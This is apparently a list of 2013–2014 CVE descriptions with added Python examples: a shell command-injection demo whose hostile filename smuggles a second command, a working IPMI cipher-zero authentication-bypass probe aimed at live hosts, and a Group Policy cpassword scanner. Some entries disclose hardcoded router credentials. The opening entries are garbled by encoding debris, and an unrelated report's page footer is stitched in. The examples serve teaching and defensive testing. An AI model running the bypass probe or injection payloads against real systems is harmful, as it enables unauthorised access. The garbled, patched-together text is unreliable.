CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo

CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
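The Sup entry is the classic shape of command injection: attacker-controlled metadata (here a MIME attachment filename) spliced into a shell command string. The following is an added example, not Sup's code: the vulnerable string-building form next to the quoted form and the argv form, with a child process run each way so the difference is visible. The viewer command and the hostile filename are constructed, and the shell demonstration assumes a POSIX sh.

```python
import shlex
import subprocess
import sys

# Constructed attachment name shaped like the Sup bug: attacker-controlled
# MIME metadata, not something the local user typed.
HOSTILE_NAME = "report.pdf; echo PWNED"


def open_command_vulnerable(viewer: str, filename: str) -> str:
    """Failure pattern: the filename is spliced into a shell command string.
    Everything after ';' becomes a second command once a shell runs it."""
    return f"{viewer} {filename}"


def open_command_quoted(viewer: str, filename: str) -> str:
    """If a shell string is unavoidable (user-configurable command templates),
    quote every substituted value. shlex.quote targets POSIX shells."""
    return f"{viewer} {shlex.quote(filename)}"


def open_command_argv(viewer: str, filename: str) -> list:
    """Preferred form: an argv vector. Each element reaches the program as one
    argument and no shell ever sees it. '--' ends option parsing in case the
    filename starts with '-'."""
    return [viewer, "--", filename]


def shell_output(command: str) -> str:
    """Run a command string through /bin/sh (shell=True) and return stdout,
    which is what a naive system()-style call does."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout.rstrip("\n")


def argv_seen_by_child(filename: str) -> str:
    """Run a child (the Python interpreter, for portability) via an argv
    vector and return the single argument it received: the metacharacters
    arrive literally instead of being interpreted."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", filename]
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")
```

With `printf %s` standing in for the viewer, the vulnerable form prints `report.pdf` and then runs the injected `echo PWNED`; the quoted form prints the whole hostile string as one argument; the argv form never consults a shell at all.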

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 21 of 28

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
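What the Supermicro entry describes is a generic IPMI 2.0 weakness rather than a vendor-specific bug: if the BMC opens an RMCP+ session with cipher suite 0 (authentication, integrity and confidentiality algorithms all "none"), the RAKP exchange that follows carries no authentication and any password is accepted. The following is an added example, not vendor code: it builds the RMCP+ Open Session Request for cipher suite 0 as read from the IPMI 2.0 specification (section 13), decodes the response, and wraps both in a UDP probe against port 623. The console session ID is arbitrary and the response decoded offline is constructed, not a capture. Run the probe only against BMCs you are authorised to test; the remediation is to disable cipher suite 0 on the BMC.

```python
import socket
import struct

# RMCP header (ASF version 1, sequence 0xff = no ACK wanted, IPMI class) and
# IPMI 2.0 session-header constants, per the IPMI v2.0 specification.
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])
AUTH_TYPE_RMCP_PLUS = 0x06
PAYLOAD_OPEN_SESSION_REQUEST = 0x10
PAYLOAD_OPEN_SESSION_RESPONSE = 0x11
PRIV_ADMINISTRATOR = 0x04
CIPHER_ZERO = 0x00      # algorithm 0 ("none") for auth, integrity and confidentiality


def _algo_record(record_type: int, algorithm: int) -> bytes:
    # type, 2 reserved bytes, record length (always 8), algorithm, 3 reserved
    return struct.pack("<BHBB3x", record_type, 0, 8, algorithm)


def build_open_session_request(console_session_id: int = 0xA4A3A2A0,
                               cipher: int = CIPHER_ZERO, tag: int = 0) -> bytes:
    """RMCP+ Open Session Request asking for administrator privilege and the
    given algorithm for all three records. Cipher suite 0 is algorithm 0 in
    each, which is what the cipher-zero bypass relies on."""
    payload = struct.pack("<BBH", tag, PRIV_ADMINISTRATOR, 0)       # tag, priv, reserved
    payload += struct.pack("<I", console_session_id)
    payload += _algo_record(0, cipher)   # authentication algorithm
    payload += _algo_record(1, cipher)   # integrity algorithm
    payload += _algo_record(2, cipher)   # confidentiality algorithm
    session_hdr = struct.pack("<BBIIH", AUTH_TYPE_RMCP_PLUS,
                              PAYLOAD_OPEN_SESSION_REQUEST, 0, 0, len(payload))
    return RMCP_HEADER + session_hdr + payload


def parse_open_session_response(datagram: bytes) -> dict:
    """Decode an RMCP+ Open Session Response. Status 0x00 means the BMC
    accepted the requested cipher suite; anything else is a refusal."""
    if len(datagram) < 16 or datagram[:4] != RMCP_HEADER:
        raise ValueError("not an RMCP/IPMI datagram")
    auth_type, payload_type, _sid, _seq, length = struct.unpack_from("<BBIIH", datagram, 4)
    if auth_type != AUTH_TYPE_RMCP_PLUS or (payload_type & 0x3F) != PAYLOAD_OPEN_SESSION_RESPONSE:
        raise ValueError("not an Open Session Response")
    body = datagram[16:16 + length]
    result = {"tag": body[0], "status": body[1], "privilege": body[2] & 0x0F}
    if result["status"] == 0 and len(body) >= 36:
        result["bmc_session_id"] = struct.unpack_from("<I", body, 8)[0]
        result["auth_algorithm"] = body[16]          # algorithm byte of each 8-byte record
        result["integrity_algorithm"] = body[24]
        result["confidentiality_algorithm"] = body[32]
    return result


def negotiated_cipher_zero(response: dict) -> bool:
    """True when the BMC opened a session with no authentication at all."""
    return response["status"] == 0 and all(
        response.get(k) == 0 for k in ("auth_algorithm", "integrity_algorithm",
                                       "confidentiality_algorithm"))


def constructed_response(status: int) -> bytes:
    """Offline test vector built to the same layout (not a real capture)."""
    body = struct.pack("<BBBB", 0, status, PRIV_ADMINISTRATOR, 0)
    body += struct.pack("<II", 0xA4A3A2A0, 0x01020304)       # console id, BMC id
    for record_type in (0, 1, 2):
        body += _algo_record(record_type, CIPHER_ZERO)
    hdr = struct.pack("<BBIIH", AUTH_TYPE_RMCP_PLUS, PAYLOAD_OPEN_SESSION_RESPONSE, 0, 0, len(body))
    return RMCP_HEADER + hdr + body


def accepts_cipher_zero(host: str, port: int = 623, timeout: float = 3.0) -> bool:
    """Live probe (network): does this BMC open a cipher-suite-0 session?"""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_open_session_request(), (host, port))
        data, _ = s.recvfrom(1024)
    return negotiated_cipher_zero(parse_open_session_response(data))
```

`ipmitool -I lanplus -C 0` performs the same negotiation from the command line; the point of writing it out is that the whole "authentication" the BMC performs afterwards is visible as three zero bytes in the request.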

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account with username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
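The Group Policy Preferences entry matters more than its one-line description suggests: the cpassword attribute in Preferences XML under SYSVOL is AES-256 ciphertext under a key Microsoft published in its MS-GPPREF documentation, and SYSVOL is readable by every authenticated domain user, so any such attribute is effectively a plaintext credential. The following is an added example, not Microsoft's code: a scanner that finds cpassword attributes in a SYSVOL copy and reports the account they belong to. It detects rather than decrypts. The Groups.xml sample is constructed and its cpassword value is a placeholder of the right shape, not a real blob.

```python
import base64
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Iterator, Union

# Constructed Groups.xml in the Preferences layout. The cpassword value is a
# placeholder (43 base64 characters, as a 32-byte AES blob with the padding
# stripped would be), not real ciphertext.
SAMPLE_GROUPS_XML = b"""<?xml version="1.0"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2"
        changed="2014-05-01 10:15:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2"
        changed="2014-05-01 10:16:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" userName="Backup"/>
  </User>
</Groups>"""

# Preferences files known to carry cpassword attributes.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")


def find_cpasswords(xml_data: Union[bytes, str], source: str = "<inline>") -> list:
    """One record per element carrying a cpassword attribute. The blob is
    base64 with padding removed; it is decoded only to sanity-check that it
    is AES-block aligned, never decrypted here."""
    found = []
    for elem in ET.fromstring(xml_data).iter():
        cp = elem.get("cpassword")
        if cp is None:
            continue
        ciphertext = base64.b64decode(cp + "=" * (-len(cp) % 4))
        found.append({
            "file": source,
            "element": elem.tag,
            "account": elem.get("userName") or elem.get("accountName") or elem.get("runAs"),
            "cpassword_b64": cp,
            "ciphertext_bytes": len(ciphertext),
            "block_aligned": len(ciphertext) % 16 == 0,
        })
    return found


def scan_sysvol(sysvol: Path) -> Iterator[dict]:
    """Walk a local copy or mount of SYSVOL and yield every cpassword found
    in the known Preferences files. Files are read as bytes so the XML
    declaration's own encoding is honoured."""
    for path in sysvol.rglob("*.xml"):
        if path.name in GPP_FILES:
            try:
                yield from find_cpasswords(path.read_bytes(), str(path))
            except ET.ParseError:
                continue        # not well-formed XML; not a Preferences file
```

A non-empty result is the finding; the remediation is to delete the preference items (MS14-025 removed the ability to create new ones but leaves existing ones in place) and rotate the passwords they set, since anyone with domain credentials may already have read them.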

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

